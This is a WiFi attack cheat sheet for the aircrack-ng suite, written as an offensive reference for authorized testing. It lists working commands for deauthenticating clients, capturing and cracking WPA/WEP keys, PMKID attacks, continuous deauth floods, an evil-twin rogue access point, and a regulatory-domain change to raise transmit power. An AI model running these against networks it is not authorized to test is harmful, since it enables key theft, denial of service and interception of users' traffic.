AIRCRACK-NG
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
WiFi security auditing suite. Monitor mode, packet capture, deauthentication, WEP/WPA/WPA2 cracking, and rogue AP attacks.
INSTALLATION#
sudo apt install aircrack-ng # Kali/Debian brew install aircrack-ng # macOS
MONITOR MODE#
# Check wireless interfaces iwconfig airmon-ng # Kill interfering processes sudo airmon-ng check kill # Start monitor mode sudo airmon-ng start wlan0 # Creates wlan0mon interface # Stop monitor mode sudo airmon-ng stop wlan0mon # Manual monitor mode sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up
SCANNING / RECON#
# Scan all channels sudo airodump-ng wlan0mon # Scan specific channel sudo airodump-ng wlan0mon -c 6 # Scan specific band sudo airodump-ng wlan0mon --band a # 5GHz sudo airodump-ng wlan0mon --band bg # 2.4GHz sudo airodump-ng wlan0mon --band abg # All bands # Filter by BSSID sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF # Filter by ESSID sudo airodump-ng wlan0mon --essid "TargetNetwork" # Write output sudo airodump-ng wlan0mon -w capture --output-format pcap sudo airodump-ng wlan0mon -w capture --output-format csv,pcap # Focus on target AP sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture
WPA/WPA2 HANDSHAKE CAPTURE#
# 1. Start capture on target channel sudo airodump-ng wlan0mon -c CHANNEL --bssid AP_BSSID -w handshake # 2. Deauthenticate client (force reconnection) sudo aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon # -0 = deauth, 5 = number of packets # 3. Wait for "WPA handshake: XX:XX:XX:XX:XX:XX" message # Deauth all clients sudo aireplay-ng -0 10 -a AP_BSSID wlan0mon
CRACKING WPA/WPA2#
# Dictionary attack sudo aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt # Specify target BSSID sudo aircrack-ng handshake-01.cap -b AP_BSSID -w wordlist.txt # Use multiple wordlists sudo aircrack-ng handshake-01.cap -w list1.txt,list2.txt,list3.txt # Convert to hashcat format aircrack-ng handshake-01.cap -j hashcat_file # Or use hcxpcapngtool hcxpcapngtool -o hash.22000 handshake-01.cap # Crack with hashcat (much faster with GPU) hashcat -m 22000 hash.22000 rockyou.txt # Crack with john aircrack-ng handshake-01.cap -J john_hash john --wordlist=rockyou.txt john_hash.hccap
WEP CRACKING#
# 1. Start capture sudo airodump-ng wlan0mon -c CHANNEL --bssid AP_BSSID -w wep_capture # 2. Generate traffic (ARP replay) sudo aireplay-ng -3 -b AP_BSSID -h YOUR_MAC wlan0mon # 3. Fake authentication (if no clients) sudo aireplay-ng -1 0 -a AP_BSSID -h YOUR_MAC wlan0mon # 4. Crack (need ~40,000+ IVs) sudo aircrack-ng wep_capture-01.cap
DEAUTHENTICATION ATTACKS#
# Deauth specific client sudo aireplay-ng -0 10 -a AP_BSSID -c CLIENT_MAC wlan0mon # Deauth all clients on AP sudo aireplay-ng -0 0 -a AP_BSSID wlan0mon # -0 0 = continuous deauth # Deauth with mdk3/mdk4 (more powerful) sudo mdk4 wlan0mon d -B AP_BSSID # Deauth sudo mdk4 wlan0mon d # Deauth all
PMKID ATTACK (CLIENTLESS)#
# No handshake needed — capture PMKID from AP directly # Using hcxdumptool sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=AP_BSSID --filtermode=2 --enable_status=1 # Convert to hashcat format hcxpcapngtool -o pmkid.22000 pmkid.pcapng # Crack hashcat -m 22000 pmkid.22000 rockyou.txt
PACKET INJECTION#
# Test injection capability sudo aireplay-ng -9 wlan0mon # Injection test sudo aireplay-ng -9 -a AP_BSSID wlan0mon # Against specific AP # Chopchop attack (WEP) sudo aireplay-ng -4 -b AP_BSSID wlan0mon # Fragmentation attack (WEP) sudo aireplay-ng -5 -b AP_BSSID wlan0mon # Forge ARP request sudo packetforge-ng -0 -a AP_BSSID -h YOUR_MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w forged.cap
TOOL SUITE#
Tool Purpose ---- ------- airmon-ng Monitor mode management airodump-ng Packet capture and AP scanning aireplay-ng Packet injection and deauth aircrack-ng WEP/WPA key cracking airbase-ng Rogue AP / evil twin airdecap-ng Decrypt captured packets airdecloak-ng Remove WEP cloaking packetforge-ng Forge encrypted packets airtun-ng Virtual tunnel interface besside-ng Automated WPA cracking
EVIL TWIN (ROGUE AP)#
# Create fake AP sudo airbase-ng -a AP_BSSID --essid "FreeWiFi" -c 6 wlan0mon # With forwarding (bridge to internet) sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon # Configure at0 interface for DHCP and routing
USEFUL COMMANDS#
# Check interface capabilities iw list | grep -A 10 "Supported interface modes" # Set TX power sudo iw reg set BO # Set regulatory domain sudo iwconfig wlan0 txpower 30 # Set power (if supported) # Change MAC address sudo ip link set wlan0 down sudo macchanger -r wlan0 # Random MAC sudo ip link set wlan0 up
TIPS#
- Kill NetworkManager before monitor mode (airmon-ng check kill) - Not all WiFi adapters support monitor mode and injection - Recommended chipsets: Atheros AR9271, Realtek RTL8812AU - PMKID attack is faster — no client deauth needed - Use hashcat (GPU) over aircrack-ng for WPA cracking speed - WPA3 is resistant to offline dictionary attacks - Deauth attacks are detectable by WIDS/WIPS - Always get authorization before testing WiFi networks - WEP is essentially broken; any WEP network is compromised - Capture on the correct channel for reliable handshakes